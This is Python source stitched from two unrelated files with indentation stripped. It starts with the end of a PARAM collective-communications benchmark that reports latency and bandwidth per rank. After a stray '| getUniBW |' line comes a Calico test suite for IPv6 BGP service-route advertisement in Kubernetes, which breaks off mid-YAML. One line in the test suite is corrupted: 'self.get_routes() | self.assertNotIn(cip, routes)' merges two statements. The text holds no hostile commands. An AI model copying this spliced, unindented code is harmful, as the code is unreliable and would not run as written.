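# exactly such a list of per-rank views.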
timeList = list(torch.ones(
(self.comm_size,) + timeElapsedTensor.shape,
dtype=timeElapsedTensor.dtype,
device=timeElapsedTensor.device,
).unbind(0))
collectiveArgs.opTensor = timeList
collectiveArgs.ipTensor = timeElapsedTensor
collectiveArgs.asyncOp = False
collectiveArgs.dataSize = (
timeElapsedTensor.nelement() * timeElapsedTensor.element_size()
)
collectiveArgs.numElements = timeElapsedTensor.nelement()
# use all_gather since all process groups should support it
self.backendFuncs.all_gather(collectiveArgs)
self.backendFuncs.complete_accel_ops(collectiveArgs)
return timeList
def printPreamble(self, commsParams):
logger.debug(f"\tcommsParams: {str(commsParams.__dict__)}")
header = "\n\tCOMMS-RES"
if self.collectiveArgs.collective == "pt2pt":
header += "{:>15}{:>20}{:>10}{:>10}{:>25}{:>10}{:>10}{:>15}{:>15}{:>18}{:>18}".format(
"size (B)",
"pingLatency(us):p50",
"p75",
"p95",
"pingPongLatency(us):p50",
"p75",
"p95",
"avgUniBW(GB/s)",
"avgBiBW(GB/s)",
"totalUniBW(GB/s)",
"totalBiBW(GB/s)",
)
else:
if commsParams.bitwidth < 32:
header += "-QUANT\t{:>15}{:>18}{:>25}{:>15}{:>15}{:>15}".format(
"size (B)",
"nElementsPerRank",
"P95 Latency(us): Quant",
"Comms",
"De-Quant",
"Overall",
)
elif not self.collectiveArgs.pair:
header += (
"{:>15}{:>18}{:>18}{:>12}{:>12}{:>12}{:>12}{:>15}{:>12}".format(
"size (B)",
"nElementsPerRank",
"Latency(us):p50",
"p75",
"p95",
"Min",
"Max",
"AlgBW(GB/s)",
"BusBW(GB/s)",
)
)
else:
header += "{:>15}{:>18}{:>22}{:>18}{:>12}{:>12}{:>12}{:>12}{:>15}{:>12}".format(
"total-size (B)",
"nElementsPerRank",
"nElementsPairPerRank",
"Latency(us):p50",
"p75",
"p95",
"Min",
"Max",
"AlgBW(GB/s)",
"BusBW(GB/s)",
)
print(header)
def reportBenchTimeCollWithQuant(
self,
commsParams,
results,
tensorList,
quantTimeTensorList,
dequantTimeTensorList,
):
if commsParams.backend == "xla":
latencyAcrossRanks = torch.transpose(tensorList.view(-1, 1), 0, 1)[0]
latencyAcrossRanks = latencyAcrossRanks.cpu().detach().numpy()
# quant tensor
quantLatencyAcrossRanks = torch.transpose(
quantTimeTensorList.view(-1, 1), 0, 1
)[0]
quantLatencyAcrossRanks = quantLatencyAcrossRanks.cpu().detach().numpy()
# dequant tensor
dequantLatencyAcrossRanks = torch.transpose(
dequantTimeTensorList.view(-1, 1), 0, 1
)[0]
dequantLatencyAcrossRanks = dequantLatencyAcrossRanks.cpu().detach().numpy()
else:
if isinstance(tensorList, list):
tensorList = [t.cpu().detach().numpy() for t in tensorList]
latencyAcrossRanks = np.array(tensorList)
# quant tensor
quantLatencyAcrossRanks = np.array(quantTimeTensorList)
# dequant tensor
dequantLatencyAcrossRanks = np.array(dequantTimeTensorList)
p95 = np.percentile(latencyAcrossRanks, 95)
quant_p95 = np.percentile(quantLatencyAcrossRanks, 95)
dequant_p95 = np.percentile(dequantLatencyAcrossRanks, 95)
print(
"\tCOMMS-RES-QUANT\t{:>15}{:>18}{:>25}{:>15}{:>15}{:>15}".format(
results["memSize"],
str("%d" % (results["numElements"])),
str("%.1f" % (quant_p95)),
str("%.1f" % (p95 - quant_p95 - dequant_p95)),
str("%.1f" % (dequant_p95)),
str("%.1f" % (p95)),
# str("%.3f" % (algBW)),
# str("%.3f" % (busBW)),
)
)
def reportBenchTime(
self,
commsParams,
results,
tensorList,
quantTimeTensorList,
dequantTimeTensorList,
):
# convert num_elements to the number of elements per rank
if commsParams.collective in ("all_to_all", "all_to_allv"):
results["numElements"] = int(
results["numElements"] // commsParams.comms_world_info.world_size
)
if commsParams.collective == "pt2pt":
self.reportBenchTimePt2Pt(commsParams, tensorList, results)
elif commsParams.bitwidth < 32:
self.reportBenchTimeCollWithQuant(
commsParams,
results,
tensorList,
quantTimeTensorList,
dequantTimeTensorList,
)
else:
self.reportBenchTimeColl(commsParams, results, tensorList)
def reportBenchTimeColl(self, commsParams, results, tensorList):
if commsParams.backend == "xla":
latencyAcrossRanks = torch.transpose(tensorList.view(-1, 1), 0, 1)[0]
latencyAcrossRanks = latencyAcrossRanks.cpu().detach().numpy()
else:
if isinstance(tensorList, list):
tensorList = [t.cpu().detach().numpy() for t in tensorList]
latencyAcrossRanks = np.array(tensorList)
logger.debug(f"Latency across all ranks: {latencyAcrossRanks}")
# Include only communicating ranks
if self.collectiveArgs.collective == "multicast":
commRanks = [self.collectiveArgs.srcOrDst] + self.collectiveArgs.dst_ranks
elif self.collectiveArgs.collective == "incast":
commRanks = [self.collectiveArgs.srcOrDst] + self.collectiveArgs.src_ranks
else:
commRanks = range(self.collectiveArgs.world_size)
latencyAcrossCommRanks = latencyAcrossRanks[commRanks]
logger.debug(
"Latency across communicating ranks (%s): %s"
% (commRanks, latencyAcrossCommRanks)
)
p50 = np.percentile(latencyAcrossCommRanks, 50)
p75 = np.percentile(latencyAcrossCommRanks, 75)
p95 = np.percentile(latencyAcrossCommRanks, 95)
minlat = np.amin(latencyAcrossCommRanks)
maxlat = np.amax(latencyAcrossCommRanks)
# adjust busBW
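# with quantization below 32 bits, proportionally fewer bytes cross the
# wire, so scale the reported bus bandwidth by bitwidth / 32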
busBW = results["busBW"] * (commsParams.bitwidth / 32.0)
if not self.collectiveArgs.pair:
print(
"\tCOMMS-RES{:>15}{:>18}{:>18}{:>12}{:>12}{:>12}{:>12}{:>15}{:>12}".format(
results["memSize"],
str("%d" % (results["numElements"])),
str("%.1f" % (p50)),
str("%.1f" % (p75)),
str("%.1f" % (p95)),
str("%.1f" % (minlat)),
str("%.1f" % (maxlat)),
str("%.3f" % (results["algBW"])),
str("%.3f" % (busBW)),
)
)
else:
# convert to the number of elements per rank
if commsParams.collective_pair in ("all_to_all", "all_to_allv"):
results["numElements_pair"] = int(
results["numElements_pair"]
// commsParams.comms_world_info.world_size
)
print(
"\tCOMMS-RES{:>15}{:>18}{:>22}{:>18}{:>12}{:>12}{:>12}{:>12}{:>15}{:>12}".format(
results["memSize"],
str("%d" % (results["numElements"])),
str("%d" % (results["numElements_pair"])),
str("%.1f" % (p50)),
str("%.1f" % (p75)),
str("%.1f" % (p95)),
str("%.1f" % (minlat)),
str("%.1f" % (maxlat)),
str("%.3f" % (results["algBW"])),
str("%.3f" % (busBW)),
)
)
def reportBenchTimePt2Pt(self, commsParams, resultsAcrossRanks, results):
pingLatencyAcrossRanks = []
pingPongLatencyAcrossRanks = []
uniBWAcrossRanks = []
biBWAcrossRanks = []
# idx = 0
for curRankTensor in resultsAcrossRanks:
pingLatencyAcrossRanks.append(curRankTensor[0].item())
pingPongLatencyAcrossRanks.append(curRankTensor[1].item())
uniBWAcrossRanks.append(curRankTensor[2].item())
biBWAcrossRanks.append(curRankTensor[3].item())
pingLatencyAcrossRanks = np.array(pingLatencyAcrossRanks)
pingPongLatencyAcrossRanks = np.array(pingPongLatencyAcrossRanks)
uniBWAcrossRanks = np.array(uniBWAcrossRanks)
biBWAcrossRanks = np.array(biBWAcrossRanks)
# Include only communicating ranks
commRanks = self.collectiveArgs.src_ranks + self.collectiveArgs.dst_ranks
pingLatencyAcrossCommRanks = pingLatencyAcrossRanks[commRanks]
pingPongLatencyAcrossCommRanks = pingPongLatencyAcrossRanks[commRanks]
uniBWAcrossCommRanks = uniBWAcrossRanks[commRanks]
biBWAcrossCommRanks = biBWAcrossRanks[commRanks]
logger.debug(
"Ping latency across communicating ranks (%s): %s"
% (commRanks, pingLatencyAcrossCommRanks)
)
logger.debug(
"PingPong latency across communicating ranks (%s): %s"
% (commRanks, pingPongLatencyAcrossCommRanks)
)
logger.debug(
"UniBW across all communicating ranks (%s): %s"
% (commRanks, uniBWAcrossCommRanks)
)
logger.debug(
"BiBW across all communicating ranks (%s): %s"
% (commRanks, biBWAcrossCommRanks)
)
avgUniBW = np.mean(uniBWAcrossCommRanks)
avgBiBW = np.mean(biBWAcrossCommRanks)
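# Each src/dst pairing is reported by both of its endpoints, so summing
# across src_ranks + dst_ranks double counts; halve to get the aggregate BW.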
totalUniBW = np.sum(uniBWAcrossCommRanks) / 2
totalBiBW = np.sum(biBWAcrossCommRanks) / 2
ping_p50 = np.percentile(pingLatencyAcrossCommRanks, 50)
ping_p75 = np.percentile(pingLatencyAcrossCommRanks, 75)
ping_p95 = np.percentile(pingLatencyAcrossCommRanks, 95)
ping_pong_p50 = np.percentile(pingPongLatencyAcrossCommRanks, 50)
ping_pong_p75 = np.percentile(pingPongLatencyAcrossCommRanks, 75)
ping_pong_p95 = np.percentile(pingPongLatencyAcrossCommRanks, 95)
print(
"\tCOMMS-RES{:>15}{:>20}{:>10}{:>10}{:>25}{:>10}{:>10}{:>15}{:>15}{:>18}{:>18}".format(
results["memSize"],
str("%.1f" % (ping_p50)),
str("%.1f" % (ping_p75)),
str("%.1f" % (ping_p95)),
str("%.1f" % (ping_pong_p50)),
str("%.1f" % (ping_pong_p75)),
str("%.1f" % (ping_pong_p95)),
str("%.3f" % (avgUniBW)),
str("%.3f" % (avgBiBW)),
str("%.3f" % (totalUniBW)),
str("%.3f" % (totalBiBW)),
)
)
def benchTime(self, index, commsParams, backendFuncs):
# Get NW stack specific parameters
(
local_rank,
global_rank,
world_size,
group,
curDevice,
curHwDevice,
allSizes,
computeFunc,
) = self.initCollectiveArgs(commsParams)
backendFuncs.sync_barrier(self.collectiveArgs)
if global_rank == 0:
self.printPreamble(commsParams)
for curSize in allSizes:
results = {}
timeUsElapsedList = []
quantTimeElapsedList = []
dequantTimeElapsedList = []
numElements = int(curSize // commsParams.element_size)
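# e.g. curSize of 1024 bytes with float32 elements (element_size 4) gives
# 256 elements per message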
collectiveFunc = self.backendFuncs.noop
collectiveFunc_pair = self.backendFuncs.noop
if (
commsParams.mode != "compute"
): # comms specific initializations if not in compute-only mode
# set corresponding function pointers
if commsParams.collective != "pt2pt":
collectiveFunc = backendFuncs.collectiveFunc[commsParams.collective]
(
self.collectiveArgs.ipTensor,
self.collectiveArgs.opTensor,
) = self.prepComm(
curComm={
"in_msg_size": numElements,
"out_msg_size": numElements,
"world_size": world_size,
},
commsParams=commsParams,
)
# Setup the arguments.
self.collectiveArgs.dataSize = curSize
self.collectiveArgs.numElements = numElements
self.collectiveArgs.waitObj = []
results["numElements"] = numElements
if (
commsParams.pair and commsParams.mode != "compute"
): # comms-pair specific initializations if not in compute-only mode:
# set corresponding function pointers
collectiveFunc_pair = backendFuncs.collectiveFunc[
commsParams.collective_pair
]
# TODO: allow user to set specific size
# Setup the arguments.
self.collectiveArgs.dataSize_pair = curSize
self.collectiveArgs.numElements_pair = int(
self.collectiveArgs.dataSize_pair // commsParams.element_size
)
results["numElements_pair"] = self.collectiveArgs.numElements_pair
(
self.collectiveArgs.ipTensor_pair,
self.collectiveArgs.opTensor_pair,
) = self.prepComm(
curComm={
"in_msg_size": self.collectiveArgs.numElements_pair,
"out_msg_size": self.collectiveArgs.numElements_pair,
"world_size": world_size,
},
commsParams=commsParams,
)
# self.collectiveArgs has all the information on the experiment.
if commsParams.collective == "pt2pt":
results.update(self.runPt2Pt())
timeUsElapsedList = [
np.mean(np.array(results["pingPerIterNS"])) / 1e3,
np.mean(np.array(results["pingPongPerIterNS"])) / 1e3,
results["avgUniBW"],
results["avgBiBW"],
] # time in US
if (
global_rank in self.collectiveArgs.src_ranks
or global_rank in self.collectiveArgs.dst_ranks
):
logger.debug(timeUsElapsedList)
else:
results.update(
self.runColl(
comm_fn=collectiveFunc,
compute_fn=computeFunc,
comm_fn_pair=collectiveFunc_pair,
)
)
timeUsElapsedList = [results["timeUS"]]
# perform a data validation check on the final opTensor
if commsParams.dcheck == 1:
self.dcheck(commsParams, curSize, self.collectiveArgs.opTensor)
backendFuncs.clear_memory(self.collectiveArgs)
# gather quantization overhead if enabled
if commsParams.bitwidth < 32:
# calculate average (de-)quantization overhead
results["quantTimeUS"] = (
self.collectiveArgs.quant_time.getTimeUS()
/ self.collectiveArgs.numIters
)
results["dequantTimeUS"] = (
self.collectiveArgs.dequant_time.getTimeUS()
/ self.collectiveArgs.numIters
)
quantTimeElapsedList.append(results["quantTimeUS"])
dequantTimeElapsedList.append(results["dequantTimeUS"])
logger.debug(quantTimeElapsedList)
quantTimeElapsedList = self.gatherBenchTime(
self.collectiveArgs, commsParams, quantTimeElapsedList
)
dequantTimeElapsedList = self.gatherBenchTime(
self.collectiveArgs, commsParams, dequantTimeElapsedList
)
# gather and report performance to stdout
tensorList = self.gatherBenchTime(
self.collectiveArgs, commsParams, timeUsElapsedList
)
if global_rank == 0:
self.reportBenchTime(
commsParams,
results,
tensorList,
quantTimeElapsedList,
dequantTimeElapsedList,
)
self.backendFuncs.sync_barrier(
self.collectiveArgs, desc=f"curSize_{curSize}"
)
comms_utils.clearQuantCommCtx(self.collectiveArgs)
# wait until rank 0 has reported results so other ranks don't interleave their output
self.backendFuncs.sync_barrier(self.collectiveArgs, "benchtime")
def runBench(self, comms_world_info, commsParams):
# Init the desired backend
if commsParams.nw_stack == "pytorch-dist":
from pytorch_dist_backend import PyTorchDistBackend
backendObj = PyTorchDistBackend(comms_world_info, commsParams)
elif commsParams.nw_stack == "pytorch-xla-tpu":
from pytorch_tpu_backend import PyTorchTPUBackend
backendObj = PyTorchTPUBackend(comms_world_info, commsParams)
else:
logger.error("Unsupported NW stack! ")
comms_utils.gracefulExit()
self.backendFuncs = backendObj
try:
backendObj.benchmark_comms()
except ValueError as ve:
if commsParams.backend == "ucc":
logger.critical("PyTorch UCC not implemented? {}".format(repr(ve)))
raise
def main():
collBenchObj = commsCollBench()
### parse arguments ###
parser = argparse.ArgumentParser(
description="PARAM-Comm Benchmark",
formatter_class=MultilineFormatter,
)
args, leftovers = collBenchObj.readArgs(parser)
collBenchObj.checkArgs(args)
comms_env_params = comms_utils.read_comms_env_vars()
if comms_env_params["global_rank"] == 0:
print("\t MPI environment: %s " % (str(comms_env_params)))
print(
"\t backend: %s nw-stack: %s mode: %s args.b: %d args.e: %d args.f: %d args.z: %s args.master_ip: %s "
% (
args.backend,
args.nw_stack,
args.mode,
args.b,
args.e,
args.f,
args.z,
args.master_ip,
)
)
element_size = torch.ones([1], dtype=args.dtype).element_size()
comms_world_info = comms_utils.comms_world_info_holder(
args.master_ip, args.master_port, args.num_tpu_cores, comms_env_params
)
commsParams = comms_utils.commsParamsHolder(
args, comms_world_info, element_size, collBenchObj.benchTime
)
if args.pair and args.overlap_pair_pgs:
commsParams.num_pgs = 2
collBenchObj.runBench(comms_world_info, commsParams)
if __name__ == "__main__":
main()
| getUniBW |
test_bgp_advert_v6.py | # Copyright (c) 2020 Tigera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import subprocess
import json
import sys
from tests.k8st.test_base import TestBaseV6
from tests.k8st.utils.utils import start_external_node_with_bgp, \
retry_until_success, run, curl, DiagsCollector, calicoctl, kubectl, node_info
_log = logging.getLogger(__name__)
attempts = 10
bird_conf = """
# Template for all BGP clients
template bgp bgp_template {
debug { states };
description "Connection to BGP peer";
local as 64512;
multihop;
gateway recursive; # This should be the default, but just in case.
import all; # Import all routes, since we don't know what the upstream
# topology is and therefore have to trust the ToR/RR.
export all;
source address ip@local; # The local address we use for the TCP connection
add paths on;
graceful restart; # See comment in kernel section about graceful restart.
connect delay time 2;
connect retry time 5;
error wait time 5,30;
}
# ------------- Node-to-node mesh -------------
protocol bgp Mesh_with_master_node from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
protocol bgp Mesh_with_node_1 from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
protocol bgp Mesh_with_node_2 from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
protocol bgp Mesh_with_node_3 from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
"""
# BIRD config for an external node to peer with
# the in-cluster route reflector on kube-node-2.
bird_conf_rr = """
# Template for all BGP clients
template bgp bgp_template {
debug { states };
description "Connection to BGP peer";
local as 64512;
multihop;
gateway recursive; # This should be the default, but just in case.
import all; # Import all routes, since we don't know what the upstream
# topology is and therefore have to trust the ToR/RR.
export all;
source address ip@local; # The local address we use for the TCP connection
add paths on;
graceful restart; # See comment in kernel section about graceful restart.
connect delay time 2;
connect retry time 5;
error wait time 5,30;
}
protocol bgp Mesh_with_node_2 from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
"""
class _TestBGPAdvertV6(TestBaseV6):
def setUp(self):
super(_TestBGPAdvertV6, self).setUp()
# Create bgp test namespace
self.ns = "bgp-test"
self.create_namespace(self.ns)
self.nodes, self.ipv4s, self.ipv6s = node_info()
self.external_node_ip = start_external_node_with_bgp(
"kube-node-extra",
bird6_peer_config=self.get_bird_conf(),
)
# Enable debug logging
self.update_ds_env("calico-node",
"kube-system",
{"BGP_LOGSEVERITYSCREEN": "debug"})
# Establish BGPPeer from cluster nodes to node-extra
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPPeer
metadata:
name: node-extra.peer%s
EOF
""" % self.get_extra_peer_spec())
def tearDown(self):
super(_TestBGPAdvertV6, self).tearDown()
self.delete_and_confirm(self.ns, "ns")
try:
# Delete the extra node.
run("docker rm -f kube-node-extra")
except subprocess.CalledProcessError:
pass
# Delete BGPPeers.
calicoctl("delete bgppeer node-extra.peer", allow_fail=True)
calicoctl("delete bgppeer peer-with-rr", allow_fail=True)
# Restore node-to-node mesh.
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata: {name: default}
spec:
nodeToNodeMeshEnabled: true
asNumber: 64512
EOF
""")
# Remove node-2's route-reflector config.
json_str = calicoctl("get node %s -o json" % self.nodes[2])
node_dict = json.loads(json_str)
node_dict['metadata']['labels'].pop('i-am-a-route-reflector', '')
node_dict['spec']['bgp'].pop('routeReflectorClusterID', '')
calicoctl("""apply -f - << EOF
%s
EOF
""" % json.dumps(node_dict))
def get_svc_cluster_ip(self, svc, ns):
return kubectl("get svc %s -n %s -o json | jq -r .spec.clusterIP" %
(svc, ns)).strip()
def assert_ecmp_routes(self, dst, via):
matchStr = dst + " proto bird metric 1024 pref medium"
# sort ips and construct match string for ECMP routes.
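# For example, for dst fd00:10:96::10 spread over two nodes, the kernel
# route (as shown by "ip -6 route") looks roughly like:
#   fd00:10:96::10 proto bird metric 1024 pref medium
#       nexthop via 2001:20::1 dev eth0 weight 1
#       nexthop via 2001:20::2 dev eth0 weight 1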
for ip in sorted(via):
matchStr += "\n\tnexthop via %s dev eth0 weight 1 " % ip
retry_until_success(lambda: self.assertIn(matchStr, self.get_routes()))
def get_svc_host_ipv6(self, svc, ns):
ipv4 = kubectl("get po -l app=%s -n %s -o json | jq -r .items[0].status.hostIP" %
(svc, ns)).strip()
for i in range(len(self.ipv4s)):
if ipv4 == self.ipv4s[i]:
return self.ipv6s[i]
assert False, "no matching IPv6 address found for host IP %s" % ipv4
def add_svc_external_ips(self, svc, ns, ips):
ipsStr = ','.join('"{0}"'.format(ip) for ip in ips)
patchStr = "{\"spec\": {\"externalIPs\": [%s]}}" % (ipsStr)
return kubectl("patch svc %s -n %s --patch '%s'" % (svc, ns, patchStr)).strip()
class TestBGPAdvertV6(_TestBGPAdvertV6):
# In the tests of this class we have a full BGP mesh between the
# cluster nodes (kube-control-plane, kube-node-1 and kube-node-2)
# and the external node (kube-node-extra):
#
# - The full mesh between the cluster nodes is configured by
# nodeToNodeMeshEnabled: true.
#
# - The peerings from each cluster node to the external node are
# configured by self.get_extra_peer_spec().
#
# - The peerings from the external node to each cluster node are
# configured by self.get_bird_conf().
def get_bird_conf(self):
return bird_conf % (self.ipv6s[0], self.ipv6s[1],
self.ipv6s[2], self.ipv6s[3])
def get_extra_peer_spec(self):
return """
spec:
peerIP: %s
asNumber: 64512
""" % self.external_node_ip
def test_cluster_ip_advertisement(self):
"""
Runs the tests for service cluster IPv6 advertisement
- Create both a Local and a Cluster type NodePort service with a single replica.
- assert only local and cluster CIDR routes are advertised.
- assert /128 routes are used, source IP is preserved.
- Scale the Local NP service so it is running on multiple nodes, assert ECMP routing, source IP is preserved.
- Delete both services, assert only cluster CIDR route is advertised.
"""
with DiagsCollector():
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata:
name: default
spec:
serviceClusterIPs:
- cidr: fd00:10:96::/112
EOF
""")
# Assert that a route to the service IP range is present.
retry_until_success(lambda: self.assertIn("fd00:10:96::/112", self.get_routes()))
# Create both a Local and a Cluster type NodePort service with a single replica.
local_svc = "nginx-local"
cluster_svc = "nginx-cluster"
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", local_svc, self.ns, 80, ipv6=True)
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", cluster_svc, self.ns, 80, traffic_policy="Cluster", ipv6=True)
self.wait_until_exists(local_svc, "svc", self.ns)
self.wait_until_exists(cluster_svc, "svc", self.ns)
# Get clusterIPs.
local_svc_ip = self.get_svc_cluster_ip(local_svc, self.ns)
cluster_svc_ip = self.get_svc_cluster_ip(cluster_svc, self.ns)
# Wait for the deployments to roll out.
self.wait_for_deployment(local_svc, self.ns)
self.wait_for_deployment(cluster_svc, self.ns)
# Assert that both nginx services can be curled from the external node.
retry_until_success(curl, function_args=[local_svc_ip])
retry_until_success(curl, function_args=[cluster_svc_ip])
# Assert that local clusterIP is an advertised route and cluster clusterIP is not.
retry_until_success(lambda: self.assertIn(local_svc_ip, self.get_routes()))
retry_until_success(lambda: self.assertNotIn(cluster_svc_ip, self.get_routes()))
# TODO: This assertion is actually incorrect. Kubernetes performs
# SNAT on all traffic destined to a service ClusterIP that doesn't
# originate from within the cluster's pod CIDR. This assertion
# would pass for External / LoadBalancer IPs, though.
#
# Create a network policy that only accepts traffic from the external node.
# Applying this policy asserts that traffic is not being SNAT'd by kube-proxy
# when it reaches the destination node.
# kubectl("""apply -f - << EOF
# apiVersion: networking.k8s.io/v1
# kind: NetworkPolicy
# metadata:
# name: allow-tcp-80-ex
# namespace: bgp-test
# spec:
# podSelector: {}
# policyTypes:
# - Ingress
# ingress:
# - from:
# - ipBlock: { cidr: %s/128 }
# ports:
# - protocol: TCP
# port: 80
# EOF
# """ % self.external_node_ip)
# Connectivity to nginx-local should always succeed.
for i in range(attempts):
retry_until_success(curl, retries=200, wait_time=5, function_args=[local_svc_ip])
# NOTE: Unlike in the IPv4 case (in test_bgp_advert.py) we cannot successfully test that
# connectivity to nginx-cluster is load-balanced across all nodes (and hence, with the
# above policy in place, will sometimes fail and sometimes succeed), because our current
# observation is that Linux's IPv6 ECMP route choice does _not_ depend on source port,
# even though it is documented as such when fib_multipath_hash_policy == 1.
# Scale the local_svc to 4 replicas
self.scale_deployment(local_svc, self.ns, 4)
self.wait_for_deployment(local_svc, self.ns)
self.assert_ecmp_routes(local_svc_ip, [self.ipv6s[1], self.ipv6s[2], self.ipv6s[3]])
for i in range(attempts):
retry_until_success(curl, function_args=[local_svc_ip])
# Delete both services.
self.delete_and_confirm(local_svc, "svc", self.ns)
self.delete_and_confirm(cluster_svc, "svc", self.ns)
# Assert that clusterIP is no longer an advertised route.
retry_until_success(lambda: self.assertNotIn(local_svc_ip, self.get_routes()))
def test_external_ip_advertisement(self):
"""
Runs the tests for service external IPv6 advertisement
"""
with DiagsCollector():
# Whitelist two IP ranges for the external IPs we'll test with
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata:
name: default
spec:
serviceExternalIPs:
- cidr: fd5f:1234:175:200::/112
- cidr: fd5f:1234:200:255::/120
EOF
""")
# Create both a Local and a Cluster type NodePort service with a single replica.
local_svc = "nginx-local"
cluster_svc = "nginx-cluster"
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", local_svc, self.ns, 80, ipv6=True)
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", cluster_svc, self.ns, 80, traffic_policy="Cluster", ipv6=True)
self.wait_until_exists(local_svc, "svc", self.ns)
self.wait_until_exists(cluster_svc, "svc", self.ns)
# Get clusterIPs.
local_svc_ip = self.get_svc_cluster_ip(local_svc, self.ns)
cluster_svc_ip = self.get_svc_cluster_ip(cluster_svc, self.ns)
# Wait for the deployments to roll out.
self.wait_for_deployment(local_svc, self.ns)
self.wait_for_deployment(cluster_svc, self.ns)
# Assert that clusterIPs are not advertised.
retry_until_success(lambda: self.assertNotIn(local_svc_ip, self.get_routes()))
retry_until_success(lambda: self.assertNotIn(cluster_svc_ip, self.get_routes()))
# Create a network policy that only accepts traffic from the external node.
kubectl("""apply -f - << EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-tcp-80-ex
namespace: bgp-test
spec:
podSelector: {}
policyTypes:
- Ingress
ingress:
- from:
- ipBlock: { cidr: %s/128 }
ports:
- protocol: TCP
port: 80
EOF
""" % self.external_node_ip)
# Get host IPs for the nginx pods.
local_svc_host_ip = self.get_svc_host_ipv6(local_svc, self.ns)
cluster_svc_host_ip = self.get_svc_host_ipv6(cluster_svc, self.ns)
# Select an IP from each external IP CIDR.
local_svc_external_ip = "fd5f:1234:175:200::1"
cluster_svc_external_ip = "fd5f:1234:200:255::1"
# Add external IPs to the two services.
self.add_svc_external_ips(local_svc, self.ns, [local_svc_external_ip])
self.add_svc_external_ips(cluster_svc, self.ns, [cluster_svc_external_ip])
# Verify that the external IP of the local service is advertised, but not that of the cluster service.
local_svc_externalips_route = "%s via %s" % (local_svc_external_ip, local_svc_host_ip)
cluster_svc_externalips_route = "%s via %s" % (cluster_svc_external_ip, cluster_svc_host_ip)
retry_until_success(lambda: self.assertIn(local_svc_externalips_route, self.get_routes()))
retry_until_success(lambda: self.assertNotIn(cluster_svc_externalips_route, self.get_routes()))
# Scale the local_svc to 4 replicas.
self.scale_deployment(local_svc, self.ns, 4)
self.wait_for_deployment(local_svc, self.ns)
# Verify that we have ECMP routes for the external IP of the local service.
retry_until_success(lambda: self.assert_ecmp_routes(local_svc_external_ip, [self.ipv6s[1], self.ipv6s[2], self.ipv6s[3]]))
# Delete both services, assert only cluster CIDR route is advertised.
self.delete_and_confirm(local_svc, "svc", self.ns)
self.delete_and_confirm(cluster_svc, "svc", self.ns)
# Assert that external IP is no longer an advertised route.
retry_until_success(lambda: self.assertNotIn(local_svc_externalips_route, self.get_routes()))
def test_many_services(self):
"""
Creates a lot of IPv6 services quickly
"""
with DiagsCollector():
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata:
name: default
spec:
serviceClusterIPs:
- cidr: fd00:10:96::/112
EOF
""")
# Assert that a route to the service IP range is present.
retry_until_success(lambda: self.assertIn("fd00:10:96::/112", self.get_routes()))
# Create a local service and deployment.
local_svc = "nginx-local"
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", local_svc, self.ns, 80, ipv6=True)
self.wait_for_deployment(local_svc, self.ns)
# Get clusterIPs.
cluster_ips = []
cluster_ips.append(self.get_svc_cluster_ip(local_svc, self.ns))
# Create many more services which select this deployment.
num_svc = 300
for i in range(num_svc):
name = "nginx-svc-%s" % i
self.create_service(name, local_svc, self.ns, 80, ipv6=True)
# Get all of their IPs.
for i in range(num_svc):
name = "nginx-svc-%s" % i
cluster_ips.append(self.get_svc_cluster_ip(name, self.ns))
# Assert they are all advertised to the other node. This should happen
# quickly enough that by the time we have queried all services from
# the k8s API, they should be programmed on the remote node.
def check_routes_advertised():
routes = self.get_routes()
for cip in cluster_ips:
self.assertIn(cip, routes)
retry_until_success(check_routes_advertised, retries=3, wait_time=5)
# Scale to 0 replicas, assert all routes are removed.
self.scale_deployment(local_svc, self.ns, 0)
self.wait_for_deployment(local_svc, self.ns)
def check_routes_gone():
routes = self.get_routes() | self.assertNotIn(cip, routes)
retry_until_success(check_routes_gone, retries=10, wait_time=5)
class TestBGPAdvertV6RR(_TestBGPAdvertV6):
# In the tests of this class, kube-node-2 acts as an RR, and all
# the other nodes peer with it. Here are the peerings that we
# need for that:
#
# RR
# kube-master kube-node-1 kube-node-2 kube-node-extra
# 2001:20::8 2001:20::1 2001:20::2 2001:20::20
# | | | | | |
# | +---------+ | +---------+
# +----------------------------+
#
# The cluster-node peerings to the RR are configured by BGPPeer
# peer-with-rr. The peering from kube-node-extra to the RR (->) is
# configured by get_extra_peer_spec(); the reverse direction (<-) is
# configured in get_bird_conf().
def get_bird_conf(self):
return bird_conf_rr % self.ipv6s[2]
def get_extra_peer_spec(self):
return """
spec:
node: %s
peerIP: %s
asNumber: 64512
""" % (self.nodes[2], self.external_node_ip)
def test_rr(self):
# Create ExternalTrafficPolicy Local service with one endpoint on node-1
kubectl("""apply -f - << EOF
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-rr
namespace: bgp-test
labels:
app: nginx
spec:
replicas: 1
selector:
matchLabels:
app: nginx
run: nginx-rr
template:
metadata:
labels:
app: nginx
run: nginx-rr
spec:
containers:
- name: nginx-rr
image: nginx:1.7.9
ports:
- containerPort: 80
nodeSelector:
beta.kubernetes.io/os: linux
kubernetes.io/hostname: %s
---
apiVersion: v1
kind: Service
metadata:
